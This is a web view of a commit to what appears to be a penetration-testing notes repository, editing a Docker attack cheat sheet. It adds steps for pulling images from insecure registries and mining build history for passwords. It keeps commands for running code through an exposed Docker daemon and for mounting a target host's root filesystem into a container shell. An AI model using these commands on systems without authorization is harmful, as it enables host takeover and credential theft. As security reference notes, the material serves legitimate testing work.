whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

cleanup and additional information on how to pull images from an insecure docker registry

This commit is contained in:
gurkenhabicht 2024-01-21 21:44:13 +01:00
parent e22d73c04c
commit aba2d26776
1 changed files with 22 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
Exploits/Containers/Docker.md
View File

@ -51,7 +51,27 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
`history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords. `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
```sh ```sh
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG> curl http://test.com:5000/v2/<REPO>/<APP>/manifests/<TAG>
```
### Download Images from the Remote Repository
Remote repositories might need to be added to the insecure registries before you are able to pull from them
```sh
echo '{"insecure-registries": ["insecure-registry.com:5000"]}' >> /etc/docker/daemon.json
```
Restart the docker service afterwards and take a look at the insecure registries via
```
docker info
```
Download an image via
```sh
docker pull insecure-registry:5000/repository-name/image-name
``` ```
## Remote Docker Daemon ## Remote Docker Daemon
@ -66,15 +86,7 @@ docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
``` ```
Check out [root please](https://github.com/chrisfosterelli/dockerrootplease)
## RCE via Exposed Docker Daemon
Execute commands on socket
```sh
```
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
## Escape Container via Exposed Docker Daemon ## Escape Container via Exposed Docker Daemon